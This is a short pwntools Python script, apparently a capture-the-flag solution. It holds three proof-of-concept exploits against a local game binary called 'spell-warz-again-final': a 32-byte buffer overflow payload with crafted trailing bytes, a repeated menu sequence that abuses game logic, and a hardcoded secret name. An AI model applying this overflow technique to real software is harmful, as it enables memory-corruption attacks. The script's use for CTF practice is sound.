from pwn import process FILENAME = "./spell-warz-again-final" def poc0(): p = process(FILENAME) print p.recvuntil(">") p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) print p.recvuntil(">") p.sendline("y") print p.recvuntil(">") p.sendline("2") print p.recvuntil(">") p.sendline("4") print p.recvuntil(">") p.sendline("y") for _ in xrange(10): print p.recvuntil(">") p.sendline("100") p.interactive() def poc1(): p = process(FILENAME) print p.recvuntil(">") p.sendline("Leo") print p.recvuntil(">") p.sendline("y") for _ in range(100): print p.recvuntil(">") p.sendline("3") print p.recvuntil(">") p.sendline("0") print p.recvuntil(">") p.sendline("y") print p.recvuntil(">") p.sendline("1") print p.recvuntil(">") p.sendline("4") print p.recvuntil(">") p.sendline("y") for _ in range(10): print p.recvuntil(">") p.sendline("99") p.interactive() def poc2(): p = process(FILENAME) print p.recvuntil(">") p.sendline("__th3_w0rLd_D3str0Y3r__") print p.recvuntil(">") p.sendline("y") print p.recvuntil(">") p.sendline("2") print p.recvuntil(">") p.sendline("4") print p.recvuntil(">") p.sendline("y") for _ in xrange(10): print p.recvuntil(">") p.sendline("100") p.interactive() if __name__ == "__main__": poc1()